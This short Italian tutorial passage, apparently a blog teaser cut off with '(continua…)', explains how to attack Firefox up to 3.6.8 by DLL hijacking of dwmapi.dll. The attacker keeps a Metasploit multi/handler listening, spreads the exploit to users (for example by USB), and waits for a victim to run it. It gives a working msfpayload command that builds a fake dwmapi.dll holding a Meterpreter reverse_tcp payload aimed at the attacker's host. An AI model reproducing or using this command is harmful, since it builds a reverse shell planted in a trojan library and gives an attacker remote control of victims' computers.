Sfruttando questa opzione di metasploit, possiamo mantenere in ascolto metasploit fino che il client non si connette al nostro server.
In poche parole, se mandiamo exploit in giro (ad esempio via usb) metasploit, resta in ascolto fino che l’utente non lo esegue…
Vediamo come attaccare firefox < = 3.6.8 con il DLL Hijacking e multi/handler di metasploit.
La dll che carica firefox all’esecuzione, è:
dwmapi.dll

Creiamo la falsa dll:
sudo ./msfpayload windows/meterpreter/reverse_tcp LHOST=IP D > dwmapi.dll(continua…)














